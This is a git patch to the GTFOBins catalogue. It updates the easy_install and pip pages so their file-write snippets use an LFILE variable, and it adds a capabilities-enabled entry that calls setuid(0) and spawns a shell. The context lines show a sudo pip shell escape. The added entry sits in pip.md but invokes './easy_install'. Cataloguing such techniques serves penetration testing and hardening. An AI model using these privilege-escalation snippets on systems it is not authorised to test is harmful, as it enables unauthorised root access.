From a156e10996562132453f60ec79b857bb97225f57 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sat, 29 Sep 2018 10:51:00 +0100 Subject: [PATCH] Use LFILE in easy_install and pip file-write function --- _gtfobins/easy_install.md | 3 ++- _gtfobins/pip.md | 8 +++++++- 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/_gtfobins/easy_install.md b/_gtfobins/easy_install.md index fedc4c5..db43b38 100644 --- a/_gtfobins/easy_install.md +++ b/_gtfobins/easy_install.md @@ -51,9 +51,10 @@ functions: file-write: - description: The file path must be absolute. code: | + export LFILE=/tmp/file_to_save TF=$(mktemp -d) echo "import os; - os.execl('$(whereis python)', 'python', '-c', 'open(\"/tmp/file_to_write\",\"w+\").write(\"DATA\")')" > $TF/setup.py + os.execl('$(whereis python)', 'python', '-c', 'open(\"$LFILE\",\"w+\").write(\"DATA\")')" > $TF/setup.py easy_install $TF file-read: - description: The read file content is wrapped within program messages. diff --git a/_gtfobins/pip.md b/_gtfobins/pip.md index 60beb18..839dd95 100644 --- a/_gtfobins/pip.md +++ b/_gtfobins/pip.md @@ -50,8 +50,9 @@ functions: file-write: - description: It needs an absolute local file path. code: | + export LFILE=/tmp/file_to_save TF=$(mktemp -d) - echo 'open("/tmp/file_to_write","w+").write("DATA")' > $TF/setup.py + echo "open('$LFILE','w+').write('DATA')" > $TF/setup.py pip install $TF file-read: - description: The read file content is corrupted as wrapped within an exception error. @@ -69,4 +70,9 @@ functions: TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py sudo pip install $TF + capabilities-enabled: + - code: | + TF=$(mktemp -d) + echo "import os; os.setuid(0); os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py + ./easy_install ---